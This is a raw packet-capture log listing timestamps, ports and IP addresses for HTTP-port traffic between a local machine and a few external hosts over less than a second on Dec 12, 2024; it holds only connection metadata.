Dec 12, 2024 16:48:43.909478903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.909486055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.909497976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.909586906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.909614086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.910504103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.911132097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.911418915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.911549091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.911555052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.911700964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.912493944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.913572073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.913578033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.913670063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.052470922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.052683115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.052812099 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.053002119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.053174973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.053281069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.054044962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.054229975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.054336071 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.055126905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.055829048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.055948973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.056092978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.056142092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.056246996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.057136059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.057142973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.057264090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.058121920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.059118986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.059132099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.059165955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.059223890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.059257984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.060118914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.061168909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.061177015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.061189890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.061285973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.061317921 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.062367916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.063150883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.063302994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.063309908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.063328028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.063388109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.064244986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.065262079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.065268993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.065282106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.065377951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.066225052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.066510916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.066637039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.067194939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.067950964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.068058968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.068306923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.068312883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.068420887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.069282055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.069586039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.070055008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.070267916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.070369959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.070485115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.071307898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.071377993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.071841955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.072315931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.073112011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.073247910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.073367119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.073373079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.073482037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.074356079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.074798107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.074911118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.075360060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.075365067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.075476885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.076365948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.077359915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.077424049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.077431917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.077466011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.077497005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.078401089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.078577042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.078778028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.079781055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.079920053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.080014944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.080451012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.081443071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.081448078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.081460953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.081545115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.081574917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.082444906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.082552910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.082652092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.083496094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.083615065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.083712101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.084472895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.084666014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.084774971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.085594893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.085681915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.085783005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.086498022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.086996078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.087094069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.087492943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.087951899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.088048935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.088592052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.088643074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.088741064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.089585066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.089591980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.089704990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.090581894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.090589046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.090719938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.091573000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.091828108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.091941118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.092593908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.092705011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.092808008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.093601942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.094069958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.094651937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.094738960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.094758034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.094887972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.095639944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.095941067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.096451044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.096827984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.096834898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.096945047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.097748995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.097755909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.097873926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.098669052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.098737955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.098850012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.099689960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.100017071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.100749969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.100764036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.100861073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.101788998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.101818085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.101934910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.102806091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.102849007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.102963924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.103754044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.103880882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.104126930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.104878902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.104978085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.105104923 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.105736017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.150360107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.247672081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.247716904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.247915983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.247948885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.248058081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.248888969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.248994112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.249125004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.249437094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.249972105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.250104904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.250267029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.250967026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.251136065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.251285076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.251950979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.252079010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.252424955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.252968073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.253144979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.253247023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.253976107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.254959106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.255055904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.255063057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.255080938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.255121946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.255985022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.256336927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.256437063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.257051945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.257057905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.257158041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.258718967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.258759022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.258865118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.259040117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.259923935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.260081053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.260255098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.260262012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.260360003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.261080027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.261398077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.261507988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.262141943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.262147903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.262253046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.263183117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.263250113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.263370991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.264159918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.264381886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.264483929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.265146017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.265223026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.265321970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.266154051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.266283035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.266386986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.267210007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.267215967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.267318964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.268244028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.268366098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.268476009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.269314051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.269697905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.269928932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.270207882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.270373106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.270498991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.271280050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.271888018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.272223949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.272342920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.272524118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.273297071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.273384094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.273467064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.273484945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.274378061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.274523973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.274785995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.275345087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.275427103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.275542021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.276320934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.276679993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.277368069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.277378082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.277472973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.278378963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.278470993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.278589964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.279419899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.279841900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.279932022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.283065081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283078909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283083916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283092976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283101082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283113003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283205032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.283236980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.283442974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283529997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.283632040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.284437895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.284662962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.285420895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.285543919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.285690069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.286467075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.286509037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.286571026 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.287575006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.287727118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.287750006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.287851095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.288512945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.288961887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.289072990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.289215088 CET	80	49951	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:44.289300919 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:44.289520025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.289602995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.289917946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.290712118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.290837049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.290966988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.291620970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.291996956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.292088032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.292609930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.292622089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.292728901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.293602943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.293695927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.294567108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.294675112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.294866085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.295347929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.295582056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.295720100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.295835972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.296606064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.296730042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.296825886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.297662020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.297918081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.298055887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.298283100 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:44.298660040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.299746990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.299751997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.299762011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.299851894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.299876928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.300662041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.353446007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.417983055 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:44.418446064 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:44.419589996 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:44.440295935 CET	80	49946	185.81.68.147	192.168.2.10
